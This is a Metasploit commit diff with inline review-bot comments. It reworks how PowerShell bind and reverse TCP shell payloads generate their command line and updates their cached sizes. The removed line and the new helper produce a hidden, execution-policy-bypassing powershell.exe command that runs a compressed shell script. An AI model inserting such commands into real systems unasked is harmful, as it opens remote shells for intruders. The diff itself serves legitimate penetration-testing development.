Commit 57afc3b

Land rapid7#9044, Address generation issues with pure PSH payloads
2 parents 850aeda + 37e0683 commit 57afc3b

7 files changed

+18
-7
lines changed


lib/msf/core/payload/windows/powershell.rb

Lines changed: 12 additions & 1 deletion
@@ -44,7 +44,18 @@ def generate_powershell_code(conntype)
4444
script_in.gsub!('LHOST_REPLACE', lhost.to_s)
4545

4646
script = Rex::Powershell::Command.compress_script(script_in)
47-
"powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
47+
command_args = {
48+
noprofile: true,
49+
windowstyle: 'hidden',
50+
noninteractive: true,
51+
executionpolicy: 'bypass'
52+
}
53+
cli = Rex::Powershell::Command.generate_psh_command_line(command_args)
54+
return "#{cli} \"#{script}\""
55+
end
56+
57+
def generate
58+
command_string
4859
end
4960
end
5061
end
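Review bot: `return "#{cli} \"#{script}\""` interpolates the compressed script into a double-quoted argument with no escaping, so any `"` in the output of `compress_script` would end the argument early and change what powershell.exe runs; either escape embedded double quotes before interpolating, or add a comment stating that the compressed form never contains them. The removed line wrapped the script in `IEX $(...)`, while the new one relies on the command line built by `generate_psh_command_line` executing the quoted string as the command, which deserves a one-line comment because it is not obvious from this file alone. Smaller points: the explicit `return` on the method's last expression is redundant in Ruby, and the new `generate` delegates to `command_string`, which is not defined in this hunk, so naming the mixin that provides it in a comment would help the next reader.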

modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb

Lines changed: 1 addition & 1 deletion
@@ -10,7 +10,7 @@
1010

1111
module MetasploitModule
1212

13-
CachedSize = 1518
13+
CachedSize = 1501
1414

1515
include Msf::Payload::Single
1616
include Rex::Powershell::Command
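Review bot: CachedSize drops from 1518 to 1501 here, and the same 1501 appears in the windows and x64 bind variants in this commit while every reverse variant lands at 1509, which fits all of these modules now producing one command line from `generate_psh_command_line`; since these are hand-edited constants, please confirm each value against the length the module actually generates after this change rather than carrying the figure across files.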

modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb

Lines changed: 1 addition & 1 deletion
@@ -10,7 +10,7 @@
1010

1111
module MetasploitModule
1212

13-
CachedSize = 1526
13+
CachedSize = 1509
1414

1515
include Msf::Payload::Single
1616
include Rex::Powershell::Command

modules/payloads/singles/windows/powershell_bind_tcp.rb

Lines changed: 1 addition & 1 deletion
@@ -15,7 +15,7 @@
1515
###
1616
module MetasploitModule
1717

18-
CachedSize = 1703
18+
CachedSize = 1501
1919

2020
include Msf::Payload::Windows::Exec
2121
include Rex::Powershell::Command

modules/payloads/singles/windows/powershell_reverse_tcp.rb

Lines changed: 1 addition & 1 deletion
@@ -15,7 +15,7 @@
1515
###
1616
module MetasploitModule
1717

18-
CachedSize = 1711
18+
CachedSize = 1509
1919

2020
include Msf::Payload::Windows::Exec
2121
include Msf::Payload::Windows::Powershell
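Review bot: the visible context here includes `Msf::Payload::Windows::Powershell`, whereas the bind sibling changed in the same commit shows `include Rex::Powershell::Command` at the same position (the x64 pair has the same split), so as far as this diff shows only the reverse modules pick up the new `generate` method added to powershell.rb; if bind and reverse are meant to take different mixins, a short comment saying why would save the next reviewer the same question.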

modules/payloads/singles/windows/x64/powershell_bind_tcp.rb

Lines changed: 1 addition & 1 deletion
@@ -15,7 +15,7 @@
1515
###
1616
module MetasploitModule
1717

18-
CachedSize = 1786
18+
CachedSize = 1501
1919

2020
include Msf::Payload::Windows::Exec_x64
2121
include Rex::Powershell::Command

modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb

Lines changed: 1 addition & 1 deletion
@@ -15,7 +15,7 @@
1515
###
1616
module MetasploitModule
1717

18-
CachedSize = 1794
18+
CachedSize = 1509
1919

2020
include Msf::Payload::Windows::Exec_x64
2121
include Msf::Payload::Windows::Powershell
